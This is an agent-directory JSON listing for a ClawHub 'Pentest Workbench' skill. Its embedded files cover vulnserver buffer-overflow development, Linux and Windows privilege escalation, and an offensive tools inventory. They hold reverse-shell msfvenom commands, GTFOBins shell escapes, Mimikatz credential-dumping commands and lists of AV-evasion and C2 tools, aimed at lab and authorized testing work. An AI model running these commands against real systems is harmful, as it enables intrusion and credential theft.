{"id":"a85d5def-1ed8-4c9b-b913-29e023c78e9e","entityType":"agent","slug":"clawhub-mamuaminu-pentest-workbench","name":"Pentest Workbench","canonicalUrl":"https://www.xpersona.co/agent/clawhub-mamuaminu-pentest-workbench","canonicalPath":"/agent/clawhub-mamuaminu-pentest-workbench","generatedAt":"2026-10-10T08:45:34.753Z","source":"CLAWHUB","claimStatus":"UNCLAIMED","verificationTier":"NONE","summary":{"evidence":{"source":"editorial-content","verified":true,"confidence":"high","updatedAt":"2026-10-09T21:21:22.514Z","emptyReason":null},"description":"Comprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation. Use when performing security testi... Skill: Pentest Workbench Owner: mamuaminu Summary: Comprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation. Use when performing security testi... Tags: latest:1.0.0 Version history: v1.0.0 | 2026-04-22T12:20:29.875Z | user Initial release: buffer overflow, privesc, recon, tools catalog Archive index: Archive v1.0.0: 8 files, 11392 bytes Files: referenc","descriptionLabel":"Technical summary","evidenceSummary":"Capability contract not published. No trust telemetry is available yet. 2K downloads reported by the source. Last updated 10/9/2026.","installCommand":"clawhub skill install s17ff7gwc2t3f0facsm56ktnsd85bcmr:pentest-workbench","sourceUrl":"https://clawhub.ai/mamuaminu/pentest-workbench","homepage":"https://clawhub.ai/mamuaminu/skills/pentest-workbench","primaryLinks":[{"label":"View on ClawHub","url":"https://clawhub.ai/mamuaminu/pentest-workbench","kind":"source"},{"label":"Homepage","url":"https://clawhub.ai/mamuaminu/skills/pentest-workbench","kind":"homepage"}],"safetyScore":84,"overallRank":62,"popularityScore":66,"trustScore":null,"claimedByName":null,"isOwner":false,"seoDescription":"Comprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation. Use when performing security testi..."},"coverage":{"evidence":{"source":"public-profile","verified":false,"confidence":"medium","updatedAt":"2026-10-09T21:21:22.514Z","emptyReason":null},"protocols":[{"protocol":"OPENCLEW","label":"OpenClaw","status":"self-declared","notes":"Declared in the public agent profile."}],"capabilities":[],"verifiedCount":0,"selfDeclaredCount":1,"capabilityMatrix":{"rows":[{"key":"OPENCLEW","type":"protocol","support":"unknown","confidenceSource":"profile","notes":"Listed on profile"}],"flattenedTokens":"protocol:OPENCLEW|unknown|profile"}},"adoption":{"evidence":{"source":"CLAWHUB","verified":false,"confidence":"medium","updatedAt":"2026-10-09T21:21:22.514Z","emptyReason":null},"stars":null,"forks":null,"downloads":1984,"packageName":null,"latestVersion":"1.0.0","tractionLabel":"2K downloads"},"release":{"evidence":{"source":"CLAWHUB","verified":false,"confidence":"medium","updatedAt":"2026-10-09T21:21:22.513Z","emptyReason":null},"lastUpdatedAt":"2026-10-09T21:21:22.514Z","lastCrawledAt":"2026-10-09T21:21:22.513Z","lastIndexedAt":null,"nextCrawlAt":"2026-10-10T21:21:22.513Z","lastVerifiedAt":null,"highlights":[{"version":"1.0.0","createdAt":"2026-04-22T12:20:29.875Z","changelog":"Initial release: buffer overflow, privesc, recon, tools catalog","fileCount":8,"zipByteSize":11392}]},"execution":{"evidence":{"source":"CLAWHUB","verified":false,"confidence":"low","updatedAt":null,"emptyReason":"No published capability contract is available yet."},"installCommand":"clawhub skill install s17ff7gwc2t3f0facsm56ktnsd85bcmr:pentest-workbench","setupComplexity":"low","setupSteps":["Setup complexity is LOW. This package is likely designed for quick installation with minimal external side-effects.","Final validation: Expose the agent to a mock request payload inside a sandbox and trace the network egress before allowing access to real customer data."],"contract":{"contractStatus":"missing","authModes":[],"requires":[],"forbidden":[],"supportsMcp":false,"supportsA2a":false,"supportsStreaming":false,"inputSchemaRef":null,"outputSchemaRef":null,"dataRegion":null,"contractUpdatedAt":null,"sourceUpdatedAt":null,"freshnessSeconds":null},"invocationGuide":{"preferredApi":{"snapshotUrl":"https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/snapshot","contractUrl":"https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/contract","trustUrl":"https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/trust"},"curlExamples":["curl -s \"https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/snapshot\"","curl -s \"https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/contract\"","curl -s \"https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/trust\""],"jsonRequestTemplate":{"query":"summarize this repo","constraints":{"maxLatencyMs":2000,"protocolPreference":["OPENCLEW"]}},"jsonResponseTemplate":{"ok":true,"result":{"summary":"...","confidence":0.9},"meta":{"source":"CLAWHUB","generatedAt":"2026-10-10T08:45:34.752Z"}},"retryPolicy":{"maxAttempts":3,"backoffMs":[500,1500,3500],"retryableConditions":["HTTP_429","HTTP_503","NETWORK_TIMEOUT"]}},"endpoints":{"dossierUrl":"https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/dossier","snapshotUrl":"https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/snapshot","contractUrl":"https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/contract","trustUrl":"https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/trust"}},"reliability":{"evidence":{"source":"runtime-metrics","verified":false,"confidence":"low","updatedAt":null,"emptyReason":"No trust, reliability, or runtime telemetry is available."},"trust":{"status":"unavailable","handshakeStatus":"UNKNOWN","verificationFreshnessHours":null,"reputationScore":null,"p95LatencyMs":null,"successRate30d":null,"fallbackRate":null,"attempts30d":null,"trustUpdatedAt":null,"trustConfidence":"unknown","sourceUpdatedAt":null,"freshnessSeconds":null},"decisionGuardrails":{"doNotUseIf":["Contract metadata is missing or unavailable for deterministic execution."],"safeUseWhen":[],"riskFlags":["missing_or_unavailable_contract","trust_data_unavailable","schema_references_missing"],"operationalConfidence":"low"},"executionMetrics":{"observedLatencyMsP50":null,"observedLatencyMsP95":null,"estimatedCostUsd":null,"uptime30d":null,"rateLimitRpm":null,"rateLimitBurst":null,"lastVerifiedAt":null,"verificationSource":null},"runtimeMetrics":{"successRate":null,"avgLatencyMs":null,"avgCostUsd":null,"hallucinationRate":null,"retryRate":null,"disputeRate":null,"p50Latency":null,"p95Latency":null,"lastUpdated":null}},"benchmarks":{"evidence":{"source":"no-benchmark-data","verified":false,"confidence":"low","updatedAt":null,"emptyReason":"No benchmark suites or observed failure patterns are available."},"suites":[],"failurePatterns":[]},"artifacts":{"evidence":{"source":"CLAWHUB","verified":false,"confidence":"high","updatedAt":"2026-10-09T21:21:22.514Z","emptyReason":null},"readme":"Skill: Pentest Workbench\n\nOwner: mamuaminu\n\nSummary: Comprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation. Use when performing security testi...\n\nTags: latest:1.0.0\n\nVersion history:\n\nv1.0.0 | 2026-04-22T12:20:29.875Z | user\n\nInitial release: buffer overflow, privesc, recon, tools catalog\n\nArchive index:\n\nArchive v1.0.0: 8 files, 11392 bytes\n\nFiles: references/buffer-overflow.md (3353b), references/privesc.md (3797b), references/tools-inventory.md (5089b), scripts/pentest-recon.sh (900b), scripts/vulnserver-fuzz.py (1087b), skill-card.md (2175b), SKILL.md (4825b), _meta.json (136b)\n\nFile v1.0.0:SKILL.md\n\n---\nname: pentest-workbench\ndescription: \"Comprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation. Use when performing security testing, analyzing vulnerable targets, conducting privilege escalation, building exploits, or running reconnaissance. Covers: TCP buffer overflows (vulnserver), web application testing (VulnerableWordpress/WPScan), honeypot analysis (Cowrie), GTFOBins/LOLBAS privesc, pwn.college fundamentals, and offensive toolchain automation. Triggers on: run a pentest, exploit this, buffer overflow, privesc, OSCP, CTF, bug bounty, vulnerability assessment, rev shell, test this target.\"\n---\n\n# Pentest Workbench\n\n## Quick Start\n\n1. **Define scope** — target, rules of engagement, goals\n2. **Recon** — passive OSINT, network enumeration\n3. **Identify** — find vulnerabilities, misconfigs, weak points\n4. **Exploit** — leverage findings with appropriate technique\n5. **Document** — record steps, evidence, impact, remediation\n\n## Core Workflow\n\n### Phase 1: Recon & Enumeration\n\n- **Network OSINT**: Use `nmap`, `masscan`, `rustscan` for port discovery\n- **Passive OSINT**: Subdomain enum, WHOIS, Shodan, Censys, Google dorking\n- **Web recon**: Dirbuster, ffuf, Burp Suite crawler\n- **For vulnerable targets**: Netcat manual command probing first\n\n**Tools from linked repos:**\n- `netstalking-osint` — automated OSINT recon workflows\n- `Pentest-Tools` (40+ categories) — scanner/framework discovery, network_enum\n\n### Phase 2: Vulnerability Analysis\n\n- **Web**: WPScan for WordPress, sqlmap for SQLi, Burp for auth bypass\n- **Network**: nmap NSE scripts, Metasploit, searchsploit\n- **Binary**: IDA/Ghidra for RE, checksec for mitigations\n- **Config reviews**: weak permissions, default creds, exposed secrets\n\n### Phase 3: Exploitation\n\n**Buffer Overflow (vulnserver pattern):**\n1. Send oversized input to identify crash point\n2. Control EIP with offset measurement\n3. Find stable jump (JMP ESP / call esp)\n4. Generate shellcode (msfvenom / custom)\n5. Execute with proper alignment\n\n**Web:**\n- SQLi → sqlmap or manual union/boolean\n- XSS → Beef/XSS Hunter\n- RCE → reverse shell via pentest-tools\n\n**Privesc (GTFOBins):**\n```\n# Check sudo/suid binaries\nsudo -l\nfind / -perm -4000 2>/dev/null\n\n# Shell escape from restricted editor\n:!/bin/bash\n```\n\n**AD Attacks (Pentest-Tools):**\n- Kerberoasting, AS-REP roasting, SMB relay\n- BloodHound/Sharphound enum → Golden/DFSRM\n\n### Phase 4: Post-Exploitation\n\n- Cowrie honeypot: analyze attacker sessions for TTPs\n- Privilege escalation: kernel exploits, sudo abuse, service misconfigs\n- Persistence: scheduled tasks, services, SSH keys\n- Lateral movement: PsExec, WMI, SMB, Pass-the-Hash\n\n### Phase 5: Documentation\n\n- Steps reproducible by another tester\n- Evidence: screenshots, packet captures, log output\n- Impact: CVSS score, business risk\n- Remediation: specific, actionable fixes\n\n## Key References\n\n- **Binary exploitation**: See `references/buffer-overflow.md` (vulnserver anatomy, exploit dev)\n- **Privesc**: See `references/privesc.md` (GTFOBins/LOLBAS, Linux/Windows escalation)\n- **Tool inventory**: See `references/tools-inventory.md` (all linked tools catalogued)\n- **pwn.college**: CTF exercises for memory corruption, ROP, kernel fundamentals\n\n## Exploit Dev (vulnserver)\n\nVulnserver runs on port 9999. Vulnerable commands:\n\n| Command | Trigger Function | Buffer Size | Overflow Offset |\n|---------|-----------------|-------------|-----------------|\n| TRUN | Function3 | 2000 | ~2003 (EIP at ~2007) |\n| GMON | Function3 | 2000 | Similar to TRUN |\n| KSTET | Function2 | 60 | ~64 |\n| GTER | Function1 | 140 | ~144 |\n| LTER | Function3 | 2000 | Via transformation |\n| HTER | Function4 | 1000 | Hex-encoded |\n\n**Key insight**: `essfunc.dll` EssentialFunc10-14 also use `strcpy` into small buffers (140, 60, 2000, 2000, 1000).\n\n**Exploit strategy**:\n1. Find offset with pattern_create / mona.py\n2. Confirm EIP control\n3. Locate or craft a ROP chain if ASLR/DEP present\n4. Generate alphanumeric shellcode if bad chars restrict ASCII\n5. Use egghunter if space is small\n\n## Tool Quick Ref\n\n| Tool | Purpose | Key Command |\n|------|---------|-------------|\n| nmap | Port enum | `nmap -sCV -p- -T4 target` |\n| Burp Suite | Web testing | Proxy, Repeater, Intruder |\n| sqlmap | SQL injection | `sqlmap -r req.txt --batch` |\n| msfvenom | Shellcode gen | `msfvenom -p linux/x64/shell_tcp LHOST=x R` |\n| CrackMapExec | AD attacks | `cme smb target -u user -p pass` |\n| Evil-WinRM | Remote shell | `evil-winrm -i target -u user -p pass` |\n\n## Mindset\n\n- **Methodical > flashy** — good recon beats brute force\n- **Always document as you go** — screenshot everything\n- **Understand the payload** — not just \"it works\"\n- **Think like defender** — what would stop this attack?\n\nFile v1.0.0:_meta.json\n\n{\n  \"ownerId\": \"kn76xphpfv9rd6m5y7nbv9fttx85a4m6\",\n  \"slug\": \"pentest-workbench\",\n  \"version\": \"1.0.0\",\n  \"publishedAt\": 1776860429875\n}\n\nFile v1.0.0:references/buffer-overflow.md\n\n# Buffer Overflow Exploitation Guide (vulnserver)\n\n## Overview\n\nvulnserver is a Windows TCP server (port 9999) with 14 intentionally vulnerable commands. Each uses `strcpy` into undersized buffers — classic stack overflow training ground.\n\n## Vulnerable Functions\n\n### In vulnserver.c\n\n| Function | Buffer | Command(s) | Offset to EIP |\n|----------|--------|------------|---------------|\n| Function1 | 140 chars | GTER | ~144 |\n| Function2 | 60 chars | KSTET | ~64 |\n| Function3 | 2000 chars | TRUN, GMON, LTER | ~2003 |\n| Function4 | 1000 chars | HTER (hex-encoded) | ~1004 |\n\n### In essfunc.dll\n\n| Function | Buffer Size | Notes |\n|----------|-------------|-------|\n| EssentialFunc10 | 140 | strcpy |\n| EssentialFunc11 | 60 | strcpy |\n| EssentialFunc12 | 2000 | strcpy + printf status |\n| EssentialFunc13 | 2000 | strcpy |\n| EssentialFunc14 | 1000 | strcpy |\n\n## Exploitation Phases\n\n### 1. Fuzzing / Crash Identification\n\nUse a fuzzer or manual send to find the crash point:\n```\npython -c \"print('TRUN ' + 'A'*3000)\" | nc target 9999\n```\n\nWatch for Access Violation (SEH overwrite or EIP control).\n\n### 2. Offset Calculation\n\nGenerate a unique pattern (msf-pattern_create or mona.py):\n```\n!mona pattern_create 3000\n```\nSend pattern, crash, then:\n```\n!mona pattern_offset EIP_value\n```\n\n### 3. Control EIP\n\nConfirm EIP points to `41414141` (AAAA):\n```\nbuffer = \"A\"*N + \"B\"*4 + \"C\"*remaining\n```\nWhere N = offset, B's overwrite EIP.\n\n### 4. Find Jump Point\n\nLocate a `JMP ESP` or `CALL ESP` in memory without ASLR:\n```\n!mona jmp -r esp\n```\nOr use `msf-nasm_shell` to find opcode `FFE4` (JMP ESP).\n\n### 5. Generate Shellcode\n\nBad chars depend on the command. Common problematic chars: `\\x00\\x0a\\x0d\\x25\\x26\\x3b`\n\nGenerate with msfvenom:\n```\nmsfvenom -p windows/shell_reverse_tcp LHOST=x LPORT=443 EXITFUNC=thread -f c -b \"\\x00\\x0a\\x0d\"\n```\n\n### 6. Handle Mitigations\n\n**DEP (Data Execution Prevention):**\n- Use `msfvenom -p windows/meterpreter/reverse_tcp` with `EXITFUNC=thread`\n- Or use ROP chain to mark stack as executable (mona rop)\n\n**ASLR:**\n- Find modules without ASLR (DLLs, exe)\n- Use `!mona opt` to find non-ASLR sections\n\n**SafeSEH:**\n- Use non-SEH protected modules\n\n### 7. Egghunter (Small Buffer)\n\nWhen buffer is too small for full shellcode:\n```\negghunter = \"\\x66\\x8b\\x42\\x3b\\x80\\x74\\x0e\\xff\\xe2\\xeb\\xf9\" + shellcode\n# tag: w00t\n```\n\n### Command-Specific Notes\n\n**TRUN**: Input after `TRUN ` — stops at first `.` in data\n```\nTRUN . + payload\n```\n\n**GMON**: Input after `GMON ` — crashes at `strlen > 3950`\n```\nGMON / + payload (needs / somewhere)\n```\n\n**HTER**: Hex-encoded input. Each 2 bytes of ASCII hex → 1 byte.\n```\nHTER 41424344... (maps to ABCD)\n```\n\n**LTER**: Transforms bytes > 0x7f by subtracting 0x7f. Crashes on `.` delimiter.\n```\nLTER + payload + .\n```\n\n## Mona.py Cheatsheet\n\n```\n!mona pattern_create <length>\n!mona pattern_offset <value>\n!mona findmsp\n!mona jmp -r esp\n!mona rop -m <module.dll>\n!mona emulate\n!mona config -set WorkingFolder C:\\mona\n```\n\n## Checklist Before Exploit\n\n- [ ] Confirm EIP offset\n- [ ] Confirm architecture (x86 vs x64)\n- [ ] Identify bad chars (null terminator almost always bad)\n- [ ] Check ASLR on main binary and DLLs\n- [ ] Check DEP status\n- [ ] Note encoding requirements (HTER is hex-encoded)\n- [ ] Test stability (same input = same crash)\n- [ ] Verify shellcode executes cleanly\n\nFile v1.0.0:references/privesc.md\n\n# Privilege Escalation Reference\n\n## GTFOBins — Unix Binary Abuse\n\nGTFOBins: https://gtfobins.github.io/\n\n### Common GTFOBins Techniques\n\n**vim/vi** — Escape restricted shell:\n```\n:!/bin/bash\n:shell\n```\n\n**awk** — Spawn shell:\n```\nawk 'BEGIN {system(\"/bin/sh\")}'\n```\n\n**find** — Exec from file:\n```\nfind . -exec /bin/sh \\; -quit\n```\n\n**python/perl/ruby/node** — Shell:\n```\npython -c 'import os; os.system(\"/bin/sh\")'\nperl -e 'exec \"/bin/sh\"'\nruby -e 'exec \"/bin/sh\"'\nnode -e 'require(\"child_process\").exec(\"/bin/sh\")'\n```\n\n**less/more** — Via paging:\n```\nless /etc/passwd\n!/bin/sh\n```\n\n**tar** — Via archive:\n```\ntar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh\n```\n\n**cp** — Overwrite sensitive files:\n```\ncp /bin/sh /tmp/sh && chmod +s /tmp/sh\n```\n\n**perl** — SUID parent:\n```\nperl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\";'\n```\n\n## Sudo Abuse Checklist\n\n```bash\nsudo -l\n# Check for NOPASSWD entries\n```\n\n**Known exploitable patterns:**\n```\n(user) NOPASSWD: /usr/bin/find\n(user) NOPASSWD: /usr/bin/vim\n(user) NOPASSWD: /usr/bin/less\n(user) NOPASSWD: /usr/bin/awk\n(user) NOPASSWD: /usr/bin/python\n(user) NOPASSWD: /bin/zip /bin/tar /bin/cp\n```\n\n## SUID Binary Escalation\n\nFind SUID binaries:\n```bash\nfind / -perm -4000 -type f 2>/dev/null\n```\n\n**GTFOBins search**: Filter by Function=Privilege escalation, Context=SUID\n\n**Dangerous patterns:**\n- `nmap` (interactive mode → shell)\n- `vim` (can read/write any file)\n- `less`/`more` (escape to shell)\n- `awk` (system exec)\n- `python`/`perl`/`ruby` (OS-level access)\n\n## Linux Kernel Exploits\n\nCheck kernel version:\n```bash\nuname -a\ncat /etc/issue\n```\n\nKnown exploits (verify before running):\n- `CVE-2022-0847` (DirtyPipe) — Linux 5.8+\n- `CVE-2021-4034` (PwnKit) — polkit < 0.120\n- `CVE-2019-13272` (PTRACE_TRACEME) — <= 5.1.17\n- `CVE-2017-16995` (eBPF) — <= 4.14\n- `dirtycow` (CVE-2016-5195) — older kernels\n\nAlways verify exploit works in non-production test first.\n\n## Windows Privilege Escalation\n\n### Kernel Exploits\n- `MS16-032` — Secondary Logon\n- `CVE-2021-34527` (PrintNightmare) — RCE + privesc\n- `CVE-2022-26919` (SMBGhost) — for older unpatched systems\n\n### Windows Binary Misconfigs\n- `icacls` — Check for weak permissions on system files\n- `sc` — Modify service binary path to hijack\n- `wmic` — Process creation for lateral\n\n### Always-Useful Windows Enums\n```\nwhoami /all\nnet user admin\nnet localgroup administrators\nwmic product get name,version\nreg query HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate\n```\n\n### LOLBAS (Windows Binaries)\nhttps://lolbas-project.github.io/\n\nSimilar concept to GTFOBins but for Windows:\n- `certutil.exe` — Download, decode\n- `mshta.exe` — Execute HTA/VBS\n- `regsvr32.exe` — COM scriptlet execution\n- `wmic.exe` — Process execution\n- `bitsadmin.exe` — File transfer\n\n## Credential Access\n\n**Mimikatz** (Windows):\n```\nprivilege::debug\nsekurlsa::logonpasswords\nsekurlsa::tickets\nkerberos::list\n```\n\n**LaZagne** (Windows + Linux):\n```\npython laZagne.py all\n```\n\n**Hashdump** (if lsass accessible):\n```\nmimikatz # logonpasswords\n```\n\n## AD Privilege Escalation\n\n- **Kerberoasting**: Request SPN ticket → crack offline\n- **AS-REP Roasting**: Users with no preauth → crack hashes\n- **Unconstrained Delegation**: Printer bug → DC compromise\n- **BloodHound**: Find shortest path to Domain Admin\n\n## Quick Checklist\n\n- [ ] `sudo -l` — what can you run as root?\n- [ ] SUID binaries — `find / -perm -4000`\n- [ ] Sudo version vulnerable?\n- [ ] Kernel exploitable?\n- [ ] Passwords/reuse hashes anywhere?\n- [ ] Cron jobs with weak perms?\n- [ ] NFS/no_root_squash misconfigs?\n- [ ] World-writable scripts called by root?\n- [ ] Sensitive files world-readable?\n- [ ] Credentials in config files or history?\n\nFile v1.0.0:references/tools-inventory.md\n\n# Tools Inventory\n\nAll tools catalogued from linked repositories. Organized by category.\n\n## Reconnaissance & OSINT\n\n| Tool | Source | Purpose |\n|------|---------|---------|\n| `nmap` | Default | Port scanning, service enum, NSE scripts |\n| `masscan` | Default | Fast TCP port scanner |\n| `rustscan` | Default | Modern port scanner (golang) |\n| `Shodan` | Web | Internet-facing device search |\n| `Censys` | Web | Certificate/OSINT search |\n| `theHarvester` | Pentest-Tools | Email/subdomain OSINT |\n| `Amass` | Pentest-Tools | Subdomain enumeration |\n| `ffuf` | Default | Web directory fuzzing |\n| `dirb` | Default | Web directory brute force |\n| `netstalking-osint` | GitHub | Network OSINT automation |\n\n## Web Application Testing\n\n| Tool | Source | Purpose |\n|------|---------|---------|\n| `Burp Suite` | Default | Web proxy, repeater, intruder |\n| `OWASP ZAP` | Default | Automated scanner |\n| `WPScan` | VulnerableWordpress | WordPress vulnerability scanner |\n| `sqlmap` | Default | SQL injection automation |\n| `Beef` | Default | XSS framework |\n| `XSStrike` | Pentest-Tools | XSS detection |\n| `Commix` | Pentest-Tools | Command injection testing |\n\n## Binary Exploitation\n\n| Tool | Source | Purpose |\n|------|---------|---------|\n| `msfvenom` | Metasploit | Shellcode generation |\n| `msf-pattern_create` | Metasploit | Offset pattern creation |\n| `mona.py` | Corelan (Immunity) | Exploit dev helper (Win) |\n| `IDA Free` | Hex Rays | Disassembler |\n| `Ghidra` | NSA | Reverse engineering |\n| `pwndbg` | GitHub | GDB plugin for exploit dev |\n| `pwntools` | GitHub | CTF/exploit framework (Python) |\n| `vulnserver` | GitHub | BO training target |\n| `checksec` | GitHub | Binary mitigation checks |\n\n## Buffer Overflow Commands\n\n```bash\n# Pattern generation\nmsf-pattern_create -l 3000\n\n# Shellcode (Windows)\nmsfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=443 -f c -b \"\\x00\\x0a\\x0d\"\n\n# Egghunter\nmsfvenom -p windows/egghunter -f raw\n\n# ASMX alphanumeric shellcode\nmsfvenom -p linux/x86/shell_reverse_tcp LHOST=IP LPORT=443 -f alpha2\n```\n\n## Active Directory\n\n| Tool | Source | Purpose |\n|------|---------|---------|\n| `BloodHound` | BloodHound | AD relationship graphing |\n| `SharpHound` | BloodHound | Windows collector |\n| `CrackMapExec` | Pentest-Tools | AD enum/attack tool |\n| `Impacket` | GitHub | Python AD attack toolkit |\n| `Mimikatz` | GitHub | Windows credential access |\n| `Rubeus` | GitHub | Kerberos attacks |\n| `PowerSploit` | GitHub | PowerShell AD attacks |\n| `Nishang` | GitHub | PowerShell offensive scripts |\n\n## Post-Exploitation\n\n| Tool | Source | Purpose |\n|------|---------|---------|\n| `PowerSploit` | GitHub | PowerShell privesc/persistence |\n| `Mimikatz` | GitHub | LSASS, ticket extraction |\n| `LaZagne` | GitHub | Browser/credential recovery |\n| `SharpMapExec` | Pentest-Tools | Pass-the-Hash |\n| `Evil-WinRM` | Pentest-Tools | Remote shell via WinRM |\n| `PsExec` | Sysinternals | Remote code exec |\n| `WMIExec` | Impacket | Remote WMI execution |\n| `Cobalt Strike` | Commercial | C2 framework |\n| `Metasploit` | Default | Exploit framework |\n| `Covenant` | GitHub | C2 framework (.NET) |\n\n## Honeypots & Logging\n\n| Tool | Source | Purpose |\n|------|---------|---------|\n| `Cowrie` | GitHub | SSH/Telnet honeypot, session logging |\n| `Dionaea` | GitHub | Malware capture honeypot |\n| `Conpot` | GitHub | ICS/SCADA honeypot |\n| `Maltrail` | GitHub | Malicious traffic detection |\n\n## Payload Delivery\n\n| Tool | Source | Purpose |\n|------|---------|---------|\n| `curl` | Default | HTTP file download |\n| `wget` | Default | HTTP/FTP download |\n| `certutil` | Windows | Download + decode (LOLBAS) |\n| `powershell` | Windows | IEX download cradle |\n| `SMB` share | Impacket | File transfer via share |\n\n## AV Evasion\n\n| Tool | Source | Purpose |\n|------|---------|---------|\n| `Veil` | GitHub | Metasploit payload encryption |\n| `Shellter` | GitHub | PE injector |\n| `peCloak` | GitHub | Binary packer |\n| `Hyperion` | GitHub | Encrypted payloads |\n\n## Network Attacks\n\n| Tool | Source | Purpose |\n|------|---------|---------|\n| `Ettercap` | Default | ARP poisoning / MITM |\n| `Responder` | GitHub | NBT-NS/LLMNR spoofing |\n| `Bettercap` | GitHub | Advanced MITM |\n| `mitmproxy` | GitHub | Intercepting proxy |\n| `WireShark` | Default | Packet capture/analysis |\n| `yersinia` | Default | Layer 2 attack framework |\n\n## Wordlists & Cracking\n\n| Tool | Source | Purpose |\n|------|---------|---------|\n| `cewl` | Default | Wordlist from website |\n| `crunch` | Default | Custom wordlist gen |\n| `hashcat` | Default | GPU password cracking |\n| `john` | Default | Password hash cracking |\n| `hydra` | Default | Brute force login |\n\n## CTF / Training Platforms\n\n| Platform | URL | Focus |\n|---------|-----|-------|\n| pwn.college | pwn.college | Binary exploitation, RE, kernel |\n| HackTheBox | hackthebox.eu | All-round pen test labs |\n| TryHackMe | tryhackme.com | Guided learning paths |\n| OverTheWire | overthewire.org | Linux security challenges |\n| VulnHub | vulnhub.com | Vulnerable VM downloads |\n| PortSwigger Web Academy | portswiggers.net | Web security |\n\nFile v1.0.0:skill-card.md\n\n## Description:\n\nComprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation.\n\nThis skill is ready for commercial/non-commercial use.\n\n## Publisher:\n\n[mamuaminu](https://clawhub.ai/user/mamuaminu)\n\n### License/Terms of Use:\n\nMIT-0\n\n## Use Case:\n\nSecurity practitioners, developers, and authorized assessors use this skill to structure reconnaissance, vulnerability analysis, exploitation planning, privilege escalation review, and reporting for systems they are explicitly permitted to test.\n\n### Deployment Geography for Use:\n\nGlobal\n\n## Known Risks and Mitigations:\n\nRisk: The skill contains practical exploitation, privilege escalation, credential-access, persistence, and lateral-movement guidance.\n\nMitigation: Use it only for systems the operator owns or has explicit written permission to test, with a defined assessment scope and rules of engagement.\n\nRisk: Agent execution of offensive commands could affect unauthorized or production systems.\n\nMitigation: Require human approval before running exploitation, credential-access, persistence, or lateral-movement steps, and maintain logging and cleanup for sanctioned assessments.\n\n## Reference(s):\n\n- [Buffer Overflow Exploitation Guide](references/buffer-overflow.md)\n- [Privilege Escalation Reference](references/privesc.md)\n- [Tools Inventory](references/tools-inventory.md)\n- [GTFOBins](https://gtfobins.github.io/)\n- [LOLBAS](https://lolbas-project.github.io/)\n\n## Skill Output:\n\n**Output Type(s):** [text, markdown, code, shell commands, guidance]\n\n**Output Format:** [Markdown with inline command and code examples]\n\n**Output Parameters:** [1D]\n\n**Other Properties Related to Output:** [May include offensive security procedures that require human authorization, defined scope, logging, and cleanup before execution.]\n\n## Skill Version(s):\n\n1.0.0 (source: server release evidence)\n\n## Ethical Considerations:\n\nUsers should evaluate whether this skill is appropriate for their environment, review any generated or modified files before relying on them, and apply their organization's safety, security, and compliance requirements before deployment.","readmeExcerpt":"Skill: Pentest Workbench Owner: mamuaminu Summary: Comprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation. Use when performing security testi... Tags: latest:1.0.0 Version history: v1.0.0 | 2026-04-22T12:20:29.875Z | user Initial release: buffer overflow, privesc, recon, tools catalog Archive index: Archive v1.0.0: 8 files, 11392 bytes Files: referenc","codeSnippets":[],"executableExamples":[{"language":"text","snippet":"# Check sudo/suid binaries\nsudo -l\nfind / -perm -4000 2>/dev/null\n\n# Shell escape from restricted editor\n:!/bin/bash"},{"language":"text","snippet":"python -c \"print('TRUN ' + 'A'*3000)\" | nc target 9999"},{"language":"text","snippet":"!mona pattern_create 3000"},{"language":"text","snippet":"!mona pattern_offset EIP_value"},{"language":"text","snippet":"buffer = \"A\"*N + \"B\"*4 + \"C\"*remaining"},{"language":"text","snippet":"!mona jmp -r esp"}],"parameters":null,"dependencies":[],"permissions":[],"extractedFiles":[{"path":"SKILL.md","content":"---\nname: pentest-workbench\ndescription: \"Comprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation. Use when performing security testing, analyzing vulnerable targets, conducting privilege escalation, building exploits, or running reconnaissance. Covers: TCP buffer overflows (vulnserver), web application testing (VulnerableWordpress/WPScan), honeypot analysis (Cowrie), GTFOBins/LOLBAS privesc, pwn.college fundamentals, and offensive toolchain automation. Triggers on: run a pentest, exploit this, buffer overflow, privesc, OSCP, CTF, bug bounty, vulnerability assessment, rev shell, test this target.\"\n---\n\n# Pentest Workbench\n\n## Quick Start\n\n1. **Define scope** — target, rules of engagement, goals\n2. **Recon** — passive OSINT, network enumeration\n3. **Identify** — find vulnerabilities, misconfigs, weak points\n4. **Exploit** — leverage findings with appropriate technique\n5. **Document** — record steps, evidence, impact, remediation\n\n## Core Workflow\n\n### Phase 1: Recon & Enumeration\n\n- **Network OSINT**: Use `nmap`, `masscan`, `rustscan` for port discovery\n- **Passive OSINT**: Subdomain enum, WHOIS, Shodan, Censys, Google dorking\n- **Web recon**: Dirbuster, ffuf, Burp Suite crawler\n- **For vulnerable targets**: Netcat manual command probing first\n\n**Tools from linked repos:**\n- `netstalking-osint` — automated OSINT recon workflows\n- `Pentest-Tools` (40+ categories) — scanner/framework discovery, network_enum\n\n### Phase 2: Vulnerability Analysis\n\n- **Web**: WPScan for WordPress, sqlmap for SQLi, Burp for auth bypass\n- **Network**: nmap NSE scripts, Metasploit, searchsploit\n- **Binary**: IDA/Ghidra for RE, checksec for mitigations\n- **Config reviews**: weak permissions, default creds, exposed secrets\n\n### Phase 3: Exploitation\n\n**Buffer Overflow (vulnserver 